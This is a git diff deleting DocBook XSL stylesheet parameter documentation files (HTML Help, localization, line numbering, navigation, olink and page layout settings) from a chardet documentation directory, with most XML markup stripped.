a/chardet/docs/docbook/xsl/params/htmlhelp.show.favorities.xml b/chardet/docs/docbook/xsl/params/htmlhelp.show.favorities.xml deleted file mode 100644 index c1811d1..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.show.favorities.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.show.favorities -boolean - - -htmlhelp.show.favorities -Should be favorities tab shown? - - - - - - - - -Description - -If you want favorities tab shown in your help, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.show.menu.xml b/chardet/docs/docbook/xsl/params/htmlhelp.show.menu.xml deleted file mode 100644 index 0fad24e..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.show.menu.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.show.menu -boolean - - -htmlhelp.show.menu -Should be menu shown? - - - - - - - - -Description - -If you want application menu in your HTML Help file, turn this -parameter to 1. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.show.toolbar.text.xml b/chardet/docs/docbook/xsl/params/htmlhelp.show.toolbar.text.xml deleted file mode 100644 index ce6adff..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.show.toolbar.text.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.show.toolbar.text -boolean - - -htmlhelp.show.toolbar.text -Show text under toolbar buttons? - - - - - - - - -Description - -You can switch off display of texts under toolbar buttons by -setting this parameter to 0. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.title.xml b/chardet/docs/docbook/xsl/params/htmlhelp.title.xml deleted file mode 100644 index c5b1cb3..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.title.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.title -string - - -htmlhelp.title -Title of HTML Help - - - - - - - - -Description - -Content of this parameter will be used as a title for generated -HTML Help. If empty, title will be automatically taken from document. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.use.hhk.xml b/chardet/docs/docbook/xsl/params/htmlhelp.use.hhk.xml deleted file mode 100644 index 6c9da07..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.use.hhk.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -htmlhelp.use.hhk -boolean - - -htmlhelp.use.hhk -Should be index built using HHK file? - - - - - - - - -Description - -If non-zero, index is created using HHK file. This provides some -new features. - - - diff --git a/chardet/docs/docbook/xsl/params/htmlhelp.window.geometry.xml b/chardet/docs/docbook/xsl/params/htmlhelp.window.geometry.xml deleted file mode 100644 index e412379..0000000 --- a/chardet/docs/docbook/xsl/params/htmlhelp.window.geometry.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -htmlhelp.window.geometry -string - - -htmlhelp.window.geometry -Set initial geometry of help window - - - - - - - - -Description - -This parameter specifies initial position of help -window. E.g. - -[160,64,992,704]]]> - - - diff --git a/chardet/docs/docbook/xsl/params/hyphenate.xml b/chardet/docs/docbook/xsl/params/hyphenate.xml deleted file mode 100644 index 429bf7f..0000000 --- a/chardet/docs/docbook/xsl/params/hyphenate.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -hyphenate - - - -hyphenate -Specify hyphenation behavior - - - -true - - -Description - -If true, words may be hyphenated. Otherwise, they may not. - - - - diff --git a/chardet/docs/docbook/xsl/params/ignore.image.scaling.xml b/chardet/docs/docbook/xsl/params/ignore.image.scaling.xml deleted file mode 100644 index 40aaa77..0000000 --- a/chardet/docs/docbook/xsl/params/ignore.image.scaling.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -ignore.image.scaling -boolean - - -ignore.image.scaling -Tell the stylesheets to ignore the author's image scaling attributes - - - - - - - - -Description - -If non-zero, the scaling attributes on graphics and media objects are -ignored. - - - diff --git a/chardet/docs/docbook/xsl/params/index.preferred.page.properties.xml b/chardet/docs/docbook/xsl/params/index.preferred.page.properties.xml deleted file mode 100644 index 1a5c842..0000000 --- a/chardet/docs/docbook/xsl/params/index.preferred.page.properties.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -index.preferred.page.properties -Properties used to emphasize page number references for -significant index terms - - - - - - bold - - - - -Description - -Properties used to emphasize page number references for -significant index terms (significance=preffered). Currently works only with -XEP. - - - diff --git a/chardet/docs/docbook/xsl/params/informal.object.properties.xml b/chardet/docs/docbook/xsl/params/informal.object.properties.xml deleted file mode 100644 index 6092cc0..0000000 --- a/chardet/docs/docbook/xsl/params/informal.object.properties.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -informal.object.properties -Properties associated with a formal object such as a figure, or other component that has a title - - - - - 0.5em - 1em - 2em - 0.5em - 1em - 2em - - -Description -The styling for informal objects in docbook. Specify the spacing before and after the object. - - diff --git a/chardet/docs/docbook/xsl/params/inherit.keywords.xml b/chardet/docs/docbook/xsl/params/inherit.keywords.xml deleted file mode 100644 index fd41529..0000000 --- a/chardet/docs/docbook/xsl/params/inherit.keywords.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -inherit.keywords -boolean - - -inherit.keywords -Inherit keywords from ancestor elements? - - - - - - -Description - -If inherit.keywords -is non-zero, the keyword META for each HTML -HEAD element will include all of the keywords from -ancestral elements. Otherwise, only the keywords from the current section -will be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/insert.xref.page.number.xml b/chardet/docs/docbook/xsl/params/insert.xref.page.number.xml deleted file mode 100644 index c1b8147..0000000 --- a/chardet/docs/docbook/xsl/params/insert.xref.page.number.xml +++ /dev/null @@ -1,52 +0,0 @@ - - -insert.xref.page.number -string - - -insert.xref.page.number -Turns page numbers in xrefs on and off - - - - -no - - - -Description - -The value of this parameter determines if -cross references (xrefs) in -printed output will -include page number citations. -It has three possible values. - - - -no -No page number references will be generated. - - - -yes -Page number references will be generated -for all xref elements. -The style of page reference may be changed -if an xrefstyle -attribute is used. - - - -maybe -Page number references will not be generated -for an xref element unless -it has an -xrefstyle -attribute whose value specifies a page reference. - - - - - - diff --git a/chardet/docs/docbook/xsl/params/l10n.gentext.default.language.xml b/chardet/docs/docbook/xsl/params/l10n.gentext.default.language.xml deleted file mode 100644 index 9420c0b..0000000 --- a/chardet/docs/docbook/xsl/params/l10n.gentext.default.language.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -l10n.gentext.default.language -string - - -l10n.gentext.default.language -Sets the default language for generated text - - - - - - - - -Description - -The value of the l10n.gentext.default.language -parameter is used as the language for generated text if no setting is provided -in the source document. - - - diff --git a/chardet/docs/docbook/xsl/params/l10n.gentext.language.xml b/chardet/docs/docbook/xsl/params/l10n.gentext.language.xml deleted file mode 100644 index cb5d90e..0000000 --- a/chardet/docs/docbook/xsl/params/l10n.gentext.language.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -l10n.gentext.language -string - - -l10n.gentext.language -Sets the gentext language - - - - - - - - -Description - -If this parameter is set to any value other than the empty string, its -value will be used as the value for the language when generating text. Setting -l10n.gentext.language overrides any settings within the -document being formatted. - -It's much more likely that you might want to set the -l10n.gentext.default.language parameter. - - - diff --git a/chardet/docs/docbook/xsl/params/l10n.gentext.use.xref.language.xml b/chardet/docs/docbook/xsl/params/l10n.gentext.use.xref.language.xml deleted file mode 100644 index 5554de0..0000000 --- a/chardet/docs/docbook/xsl/params/l10n.gentext.use.xref.language.xml +++ /dev/null @@ -1,48 +0,0 @@ - - -l10n.gentext.use.xref.language -boolean - - -l10n.gentext.use.xref.language -Use the language of target when generating cross-reference text? - - - - - - - - -Description - -If non-zero, the language of the target will be used when -generating cross reference text. Usually, the current -language is used when generating text (that is, the language of the -element that contains the cross-reference element). But setting this parameter -allows the language of the element pointed to to control -the generated text. - -Consider the following example: - - -See also .]]> - - - -Suppose that Chapter 3 happens to be written in German. -If l10n.gentext.use.xref.language is non-zero, the -resulting text will be something like this: - -
    -See also Kapital 3. -
    - -Where the more traditional rendering would be: - -
    -See also Chapter 3. -
    - -
    -
    diff --git a/chardet/docs/docbook/xsl/params/label.from.part.xml b/chardet/docs/docbook/xsl/params/label.from.part.xml deleted file mode 100644 index b4866ca..0000000 --- a/chardet/docs/docbook/xsl/params/label.from.part.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -label.from.part -boolean - - -label.from.part -Renumber chapters in each part? - - - - - - -Description - -If label.from.part is non-zero, components -(chapters, appendixes, etc.) -will be numbered from 1 in each part. Otherwise, -they will be numbered monotonically throughout each -book. - - - - diff --git a/chardet/docs/docbook/xsl/params/line-height.xml b/chardet/docs/docbook/xsl/params/line-height.xml deleted file mode 100644 index 7bb6e63..0000000 --- a/chardet/docs/docbook/xsl/params/line-height.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -line-height -string - - -line-height -Specify the line-height property - - - - - - - - -Description - -Sets the line-height property. - - - diff --git a/chardet/docs/docbook/xsl/params/linenumbering.everyNth.xml b/chardet/docs/docbook/xsl/params/linenumbering.everyNth.xml deleted file mode 100644 index b288480..0000000 --- a/chardet/docs/docbook/xsl/params/linenumbering.everyNth.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -linenumbering.everyNth -integer - - -linenumbering.everyNth -Indicate which lines should be numbered - - - - - - -Description - -If line numbering is enabled, everyNth line will be numbered. - - - - diff --git a/chardet/docs/docbook/xsl/params/linenumbering.extension.xml b/chardet/docs/docbook/xsl/params/linenumbering.extension.xml deleted file mode 100644 index b9322dd..0000000 --- a/chardet/docs/docbook/xsl/params/linenumbering.extension.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -linenumbering.extension -boolean - - -linenumbering.extension -Enable the line numbering extension - - - - - - -Description - -If true, verbatim environments (elements that have the -format='linespecific' notation attribute: address, literallayout, -programlisting, screen, synopsis) that specify line numbering will -have, surprise, line numbers. - - - - diff --git a/chardet/docs/docbook/xsl/params/linenumbering.separator.xml b/chardet/docs/docbook/xsl/params/linenumbering.separator.xml deleted file mode 100644 index 1e81b5b..0000000 --- a/chardet/docs/docbook/xsl/params/linenumbering.separator.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -linenumbering.separator -string - - -linenumbering.separator -Specify a separator between line numbers and lines - - - - - - -Description - -The separator is inserted between line numbers and lines in -the verbatim environment. - - - - diff --git a/chardet/docs/docbook/xsl/params/linenumbering.width.xml b/chardet/docs/docbook/xsl/params/linenumbering.width.xml deleted file mode 100644 index 3571487..0000000 --- a/chardet/docs/docbook/xsl/params/linenumbering.width.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -linenumbering.width -integer - - -linenumbering.width -Indicates the width of line numbers - - - - - - -Description - -If line numbering is enabled, line numbers will appear right -justified in a field "width" characters wide. - - - - diff --git a/chardet/docs/docbook/xsl/params/link.mailto.url.xml b/chardet/docs/docbook/xsl/params/link.mailto.url.xml deleted file mode 100644 index c7e7fec..0000000 --- a/chardet/docs/docbook/xsl/params/link.mailto.url.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -link.mailto.url -string - - -link.mailto.url -Mailto URL for the LINK REL=made HTML HEAD element - - - - - - -Description - -If not the empty string, this address will be used for the -REL=made LINK element in the HTML HEAD. - - - - diff --git a/chardet/docs/docbook/xsl/params/list.block.spacing.xml b/chardet/docs/docbook/xsl/params/list.block.spacing.xml deleted file mode 100644 index 14a2129..0000000 --- a/chardet/docs/docbook/xsl/params/list.block.spacing.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -list.block.spacing -What spacing do you want before and after lists? - - - - - 1em - 0.8em - 1.2em - 1em - 0.8em - 1.2em - - -Description -Specify the spacing required before and after a list. It is necessary to specify the space after a list block because lists can come inside of paras. - - diff --git a/chardet/docs/docbook/xsl/params/list.item.spacing.xml b/chardet/docs/docbook/xsl/params/list.item.spacing.xml deleted file mode 100644 index 1ae484e..0000000 --- a/chardet/docs/docbook/xsl/params/list.item.spacing.xml +++ /dev/null @@ -1,17 +0,0 @@ - - -list.item.spacing -What space do you want between list items? - - - - - 1em - 0.8em - 1.2em - - -Description -Specify what spacing you want between each list item. - - diff --git a/chardet/docs/docbook/xsl/params/make.graphic.viewport.xml b/chardet/docs/docbook/xsl/params/make.graphic.viewport.xml deleted file mode 100644 index 1d3a25b..0000000 --- a/chardet/docs/docbook/xsl/params/make.graphic.viewport.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -make.graphic.viewport -boolean - - -make.graphic.viewport -Use tables in HTML to make viewports for graphics - - - - - - - - -Description - -The HTML img element only supports the notion -of content-area scaling; it doesn't support the distinction between a -content-area and a viewport-area, so we have to make some compromises. - -If make.graphic.viewport is non-zero, a table -will be used to frame the image. This creates an effective viewport-area. - - -Tables and alignment don't work together, so this parameter is ignored -if alignment is specified on an image. - - diff --git a/chardet/docs/docbook/xsl/params/make.index.markup.xml b/chardet/docs/docbook/xsl/params/make.index.markup.xml deleted file mode 100644 index eec982b..0000000 --- a/chardet/docs/docbook/xsl/params/make.index.markup.xml +++ /dev/null @@ -1,68 +0,0 @@ - - -make.index.markup -boolean - - -make.index.markup -Generate XML index markup in the index? - - - - - - - - -Description - -This parameter enables a very neat trick for getting properly -merged, collated back-of-the-book indexes. G. Ken Holman suggested -this trick at Extreme Markup Languages 2002 and I'm indebted to him -for it. - -Jeni Tennison's excellent code in -autoidx.xsl does a great job of merging and -sorting indexterms in the document and building a -back-of-the-book index. However, there's one thing that it cannot -reasonably be expected to do: merge page numbers into ranges. (I would -not have thought that it could collate and suppress duplicate page -numbers, but in fact it appears to manage that task somehow.) - -Ken's trick is to produce a document in which the index at the -back of the book is displayed in XML. Because the index -is generated by the FO processor, all of the page numbers have been resolved. -It's a bit hard to explain, but what it boils down to is that instead of having -an index at the back of the book that looks like this: - -
    -A -ap1, 1, 2, 3 - -
    - -you get one that looks like this: - -
    -A - -ap1, -1, -2, -3 -]]> -
    - -After building a PDF file with this sort of odd-looking index, you can -extract the text from the PDF file and the result is a proper index expressed in -XML. - -Now you have data that's amenable to processing and a simple Perl script -(such as fo/pdf2index) can -merge page ranges and generate a proper index. - -Finally, reformat your original document using this literal index instead of -an automatically generated one and bingo! - -
    -
    diff --git a/chardet/docs/docbook/xsl/params/make.single.year.ranges.xml b/chardet/docs/docbook/xsl/params/make.single.year.ranges.xml deleted file mode 100644 index bf2af8e..0000000 --- a/chardet/docs/docbook/xsl/params/make.single.year.ranges.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -make.single.year.ranges -boolean - - -make.single.year.ranges -Print single-year ranges (e.g., 1998-1999) - - - - - - -Description - -If non-zero, year ranges that span a single year will be printed -in range notation (1998-1999) instead of discrete notation -(1998, 1999). - - - diff --git a/chardet/docs/docbook/xsl/params/make.valid.html.xml b/chardet/docs/docbook/xsl/params/make.valid.html.xml deleted file mode 100644 index d73a188..0000000 --- a/chardet/docs/docbook/xsl/params/make.valid.html.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -make.valid.html -boolean - - -make.valid.html -Attempt to make sure the HTML output is valid HTML - - - - - - - - -Description - -If make.valid.html is true, the stylesheets take -extra effort to ensure that the resulting HTML is valid. This may mean that some -para tags are translated into HTML divs or -that other substitutions occur. - -This parameter is different from html.cleanup -because it changes the resulting markup; it does not use extension functions -to manipulate result-tree-fragments and is therefore applicable to any -XSLT processor. - - - diff --git a/chardet/docs/docbook/xsl/params/make.year.ranges.xml b/chardet/docs/docbook/xsl/params/make.year.ranges.xml deleted file mode 100644 index 17f8087..0000000 --- a/chardet/docs/docbook/xsl/params/make.year.ranges.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -make.year.ranges -boolean - - -make.year.ranges -Collate copyright years into ranges? - - - - - - -Description - -If non-zero, copyright years will be collated into ranges. - - - diff --git a/chardet/docs/docbook/xsl/params/manifest.in.base.dir.xml b/chardet/docs/docbook/xsl/params/manifest.in.base.dir.xml deleted file mode 100644 index d8f2423..0000000 --- a/chardet/docs/docbook/xsl/params/manifest.in.base.dir.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -manifest.in.base.dir -boolean - - -manifest.in.base.dir -Should be manifest file written in $base.dir? - - - - - - - - -Description - -If non-zero manifest file and project files for HTML Help and -Eclipse Help are written into base.dir instead -of current directory. - - - diff --git a/chardet/docs/docbook/xsl/params/manifest.xml b/chardet/docs/docbook/xsl/params/manifest.xml deleted file mode 100644 index 4022d9c..0000000 --- a/chardet/docs/docbook/xsl/params/manifest.xml +++ /dev/null @@ -1,23 +0,0 @@ - - - manifest - string - - - manifest - Name of manifest file - - - - - - - Description - - The name of the file to which a manifest is written (if the - value of the generate.manifest parameter - is non-zero). - - - diff --git a/chardet/docs/docbook/xsl/params/manual.toc.xml b/chardet/docs/docbook/xsl/params/manual.toc.xml deleted file mode 100644 index 760e612..0000000 --- a/chardet/docs/docbook/xsl/params/manual.toc.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -manual.toc -string - - -manual.toc -An explicit TOC to be used for the TOC - - - - - - - - -Description - -The manual.toc identifies an explicit TOC that -will be used for building the printed TOC. - - - - diff --git a/chardet/docs/docbook/xsl/params/marker.section.level.xml b/chardet/docs/docbook/xsl/params/marker.section.level.xml deleted file mode 100644 index b944f9c..0000000 --- a/chardet/docs/docbook/xsl/params/marker.section.level.xml +++ /dev/null @@ -1,45 +0,0 @@ - - -marker.section.level -integer - - -marker.section.level -Control depth of sections shown in running headers or footers - - - - - - - - -Description - -The marker.section.level parameter -controls the depth of section levels that may be displayed -in running headers and footers. For example, if the value -is 2 (the default), then titles from sect1 and -sect2 or equivalent section -elements are candidates for use in running headers and -footers. - -Each candidate title is marked in the FO output with a -<fo:marker marker-class-name="section.head.marker"> -element. - -In order for such titles to appear in headers -or footers, the header.content -or footer.content template -must be customized to retrieve the marker using -an output element such as: - - -<fo:retrieve-marker retrieve-class-name="section.head.marker" - retrieve-position="first-including-carryover" - retrieve-boundary="page-sequence"/> - - - - - diff --git a/chardet/docs/docbook/xsl/params/menuchoice.menu.separator.xml b/chardet/docs/docbook/xsl/params/menuchoice.menu.separator.xml deleted file mode 100644 index 2261894..0000000 --- a/chardet/docs/docbook/xsl/params/menuchoice.menu.separator.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -menuchoice.menu.separator - - - -menuchoice.menu.separator - - - - - - - - - -Description - -Separator used to connect items of a menuchoice with -guimenuitem or guisubmenu. Other elements -are linked with menuchoice.separator. - - - - diff --git a/chardet/docs/docbook/xsl/params/menuchoice.separator.xml b/chardet/docs/docbook/xsl/params/menuchoice.separator.xml deleted file mode 100644 index 1a2f86b..0000000 --- a/chardet/docs/docbook/xsl/params/menuchoice.separator.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -menuchoice.separator - - - -menuchoice.separator - - - - - - - - - -Description - -Separator used to connect items of a menuchoice other -than guimenuitem and guisubmenu. The latter -elements are linked with menuchoice.menu.separator. - - - - diff --git a/chardet/docs/docbook/xsl/params/monospace.font.family.xml b/chardet/docs/docbook/xsl/params/monospace.font.family.xml deleted file mode 100644 index d14bd1e..0000000 --- a/chardet/docs/docbook/xsl/params/monospace.font.family.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -monospace.font.family - - - -monospace.font.family -The default font family for monospace environments - - - - - - - - -Description - -The monospace font family is used for verbatim environments -(program listings, screens, etc.). - - - - diff --git a/chardet/docs/docbook/xsl/params/monospace.properties.xml b/chardet/docs/docbook/xsl/params/monospace.properties.xml deleted file mode 100644 index c066879..0000000 --- a/chardet/docs/docbook/xsl/params/monospace.properties.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -monospace.properties -attribute set - - -monospace.properties -Properties of monospaced content - - - - - - - - - - - - -Description - -Specifies the font name for monospaced output. This property set -used to set the font-size as well, but that doesn't work very well -when different fonts are used (as they are in titles and paragraphs, -for example). - -If you want to set the font-size in a customization layer, it's -probably going to be more appropriate to set font-size-adjust, if your -formatter supports it. - - - diff --git a/chardet/docs/docbook/xsl/params/monospace.verbatim.properties.xml b/chardet/docs/docbook/xsl/params/monospace.verbatim.properties.xml deleted file mode 100644 index 14c8559..0000000 --- a/chardet/docs/docbook/xsl/params/monospace.verbatim.properties.xml +++ /dev/null @@ -1,17 +0,0 @@ - - -monospace.verbatim.properties -What font and size do you want for monospaced content? - - - - - - start - - - -Description -Specify the font name and size you want for monospaced output - - diff --git a/chardet/docs/docbook/xsl/params/navig.graphics.extension.xml b/chardet/docs/docbook/xsl/params/navig.graphics.extension.xml deleted file mode 100644 index 833a106..0000000 --- a/chardet/docs/docbook/xsl/params/navig.graphics.extension.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -navig.graphics.extension -string - - -navig.graphics.extension -Extension for navigational graphics - - - - - - -Description - -Sets the filename extension to use on navigational graphics used -in the headers and footers of chunked HTML. - - - diff --git a/chardet/docs/docbook/xsl/params/navig.graphics.path.xml b/chardet/docs/docbook/xsl/params/navig.graphics.path.xml deleted file mode 100644 index 3a36a41..0000000 --- a/chardet/docs/docbook/xsl/params/navig.graphics.path.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -navig.graphics.path -string - - -navig.graphics.path -Path to navigational graphics - - - -images/ - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the navigational graphics used in the -headers and footers of chunked HTML. - - - - diff --git a/chardet/docs/docbook/xsl/params/navig.graphics.xml b/chardet/docs/docbook/xsl/params/navig.graphics.xml deleted file mode 100644 index fa83f3e..0000000 --- a/chardet/docs/docbook/xsl/params/navig.graphics.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -navig.graphics -boolean - - -navig.graphics -Use graphics in navigational headers and footers? - - - - - - -Description - -If true (non-zero), the navigational headers and footers in chunked -HTML are presented in an alternate style that uses -graphical icons for Next, Previous, Up, and Home. -Default graphics are provided in the distribution. - - - - diff --git a/chardet/docs/docbook/xsl/params/navig.showtitles.xml b/chardet/docs/docbook/xsl/params/navig.showtitles.xml deleted file mode 100644 index aa40588..0000000 --- a/chardet/docs/docbook/xsl/params/navig.showtitles.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -navig.showtitles -boolean - - -navig.showtitles -Display titles in HTML headers and footers? - - - -1 - - -Description - -If true (non-zero), -the headers and footers of chunked HTML -display the titles of the next and previous chunks, -along with the words 'Next' and 'Previous' (or the -equivalent graphical icons if navig.graphics is true). -If false (zero), then only the words 'Next' and 'Previous' -(or the icons) are displayed. - - - - diff --git a/chardet/docs/docbook/xsl/params/nominal.image.depth.xml b/chardet/docs/docbook/xsl/params/nominal.image.depth.xml deleted file mode 100644 index ac4935b..0000000 --- a/chardet/docs/docbook/xsl/params/nominal.image.depth.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -nominal.image.depth -length - - -nominal.image.depth -Nominal image depth - - - - - - - - -Description - -See nominal.image.width. - - - diff --git a/chardet/docs/docbook/xsl/params/nominal.image.width.xml b/chardet/docs/docbook/xsl/params/nominal.image.width.xml deleted file mode 100644 index f630af9..0000000 --- a/chardet/docs/docbook/xsl/params/nominal.image.width.xml +++ /dev/null @@ -1,38 +0,0 @@ - - -nominal.image.width -length - - -nominal.image.width -The nominal image width - - - - - - - - -Description - -Graphic widths expressed as a percentage are problematic. In the -following discussion, we speak of width and contentwidth, but -the same issues apply to depth and contentdepth. - -A width of 50% means "half of the available space for the image." -That's fine. But note that in HTML, this is a dynamic property and -the image size will vary if the browser window is resized. - -A contentwidth of 50% means "half of the actual image width". -But what does that mean if the stylesheets cannot assess the image's -actual size? Treating this as a width of 50% is one possibility, but -it produces behavior (dynamic scaling) that seems entirely out of -character with the meaning. - -Instead, the stylesheets define a -nominal.image.width and convert percentages to -actual values based on that nominal size. - - - diff --git a/chardet/docs/docbook/xsl/params/nominal.table.width.xml b/chardet/docs/docbook/xsl/params/nominal.table.width.xml deleted file mode 100644 index 6abbf0b..0000000 --- a/chardet/docs/docbook/xsl/params/nominal.table.width.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -nominal.table.width -length - - -nominal.table.width -The (absolute) nominal width of tables - - - - - - -Description - -In order to convert CALS column widths into HTML column widths, it -is sometimes necessary to have an absolute table width to use for conversion -of mixed absolute and relative widths. This value must be an absolute -length (not a percentag). - - - diff --git a/chardet/docs/docbook/xsl/params/normal.para.spacing.xml b/chardet/docs/docbook/xsl/params/normal.para.spacing.xml deleted file mode 100644 index 4e68217..0000000 --- a/chardet/docs/docbook/xsl/params/normal.para.spacing.xml +++ /dev/null @@ -1,17 +0,0 @@ - - -normal.para.spacing -What space do you want between normal paragraphs - - - - - 1em - 0.8em - 1.2em - - -Description -Specify the spacing required between normal paragraphs - - diff --git a/chardet/docs/docbook/xsl/params/olink.base.uri.xml b/chardet/docs/docbook/xsl/params/olink.base.uri.xml deleted file mode 100644 index 266030e..0000000 --- a/chardet/docs/docbook/xsl/params/olink.base.uri.xml +++ /dev/null @@ -1,17 +0,0 @@ - - -olink.base.uri -uri - - -olink.base.uri -Base URI used in olink hrefs - - - - - -Description -When cross reference data is collected for resolving olinks, it may be necessary to prepend a base URI to each target's href. This parameter lets you set that base URI when cross reference data is collected. This feature is needed when you want to link to a document that is processed without chunking. The output filename for such a document is not known to the XSL stylesheet; the only target information consists of fragment identifiers such as #idref. To enable the resolution of olinks between documents, you should pass the name of the HTML output file as the value of this parameter. Then the hrefs recorded in the cross reference data collection look like outfile.html#idref, which can be reached as links from other documents. - - diff --git a/chardet/docs/docbook/xsl/params/olink.doctitle.xml b/chardet/docs/docbook/xsl/params/olink.doctitle.xml deleted file mode 100644 index f48f9fa..0000000 --- a/chardet/docs/docbook/xsl/params/olink.doctitle.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -olink.doctitle -boolean - - -olink.doctitle -show the document title for external olinks? - - - - - - -Description -When olinks between documents are resolved for print output, the generated text may not make it clear that the reference is to another document. It is possible for the stylesheets to append the other document's title to external olinks. For this to happen, two parameters must be set. The olink.doctitle parameter should be set to nonzero to enable this -feature. And you should set the current.docid parameter to the document id for the document currently -being processed for output. If an olink's targetdoc id differs from the current.docid, then the stylesheet can append the target document's -title to the generated olink text. - - diff --git a/chardet/docs/docbook/xsl/params/olink.fragid.xml b/chardet/docs/docbook/xsl/params/olink.fragid.xml deleted file mode 100644 index 0e6d33d..0000000 --- a/chardet/docs/docbook/xsl/params/olink.fragid.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -olink.fragid -string - - -olink.fragid -Names the fragment identifier portion of an OLink resolver query - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/olink.outline.ext.xml b/chardet/docs/docbook/xsl/params/olink.outline.ext.xml deleted file mode 100644 index f0ac801..0000000 --- a/chardet/docs/docbook/xsl/params/olink.outline.ext.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -olink.outline.ext -string - - -olink.outline.ext -The extension of OLink outline files - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/olink.pubid.xml b/chardet/docs/docbook/xsl/params/olink.pubid.xml deleted file mode 100644 index 1b22818..0000000 --- a/chardet/docs/docbook/xsl/params/olink.pubid.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -olink.pubid -string - - -olink.pubid -Names the public identifier portion of an OLink resolver query - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/olink.resolver.xml b/chardet/docs/docbook/xsl/params/olink.resolver.xml deleted file mode 100644 index 5926a16..0000000 --- a/chardet/docs/docbook/xsl/params/olink.resolver.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -olink.resolver - - - -olink.resolver -The root name of the OLink resolver (usually a script) - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/olink.sysid.xml b/chardet/docs/docbook/xsl/params/olink.sysid.xml deleted file mode 100644 index cc6f3bc..0000000 --- a/chardet/docs/docbook/xsl/params/olink.sysid.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -olink.sysid -string - - -olink.sysid -Names the system identifier portion of an OLink resolver query - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/page.height.portrait.xml b/chardet/docs/docbook/xsl/params/page.height.portrait.xml deleted file mode 100644 index cffafd9..0000000 --- a/chardet/docs/docbook/xsl/params/page.height.portrait.xml +++ /dev/null @@ -1,64 +0,0 @@ - - -page.height.portrait - - - -page.height.portrait -Specify the physical size of the long edge of the page - - - - - - 210mm - 11in - 8.5in - 2378mm - 1682mm - 1189mm - 841mm - 594mm - 420mm - 297mm - 210mm - 148mm - 105mm - 74mm - 52mm - 37mm - 1414mm - 1000mm - 707mm - 500mm - 353mm - 250mm - 176mm - 125mm - 88mm - 62mm - 44mm - 1297mm - 917mm - 648mm - 458mm - 324mm - 229mm - 162mm - 114mm - 81mm - 57mm - 40mm - 11in - - - - -Description - -The portrait page height is the length of the long -edge of the physical page. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.height.xml b/chardet/docs/docbook/xsl/params/page.height.xml deleted file mode 100644 index 02ce412..0000000 --- a/chardet/docs/docbook/xsl/params/page.height.xml +++ /dev/null @@ -1,32 +0,0 @@ - - -page.height - - - -page.height -The height of the physical page - - - - - - - - - - - - - - - -Description - -The page height is generally calculated from the -paper.type and -page.orientation. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.margin.bottom.xml b/chardet/docs/docbook/xsl/params/page.margin.bottom.xml deleted file mode 100644 index 1a3b29f..0000000 --- a/chardet/docs/docbook/xsl/params/page.margin.bottom.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -page.margin.bottom - - - -page.margin.bottom -The bottom margin of the page - - - - - - - - -Description - -The bottom page margin is the distance from the bottom of the region-after -to the physical bottom of the page. - - - - diff --git a/chardet/docs/docbook/xsl/params/page.margin.inner.xml b/chardet/docs/docbook/xsl/params/page.margin.inner.xml deleted file mode 100644 index cb3b3b8..0000000 --- a/chardet/docs/docbook/xsl/params/page.margin.inner.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -page.margin.inner - - - -page.margin.inner -The inner page margin - - 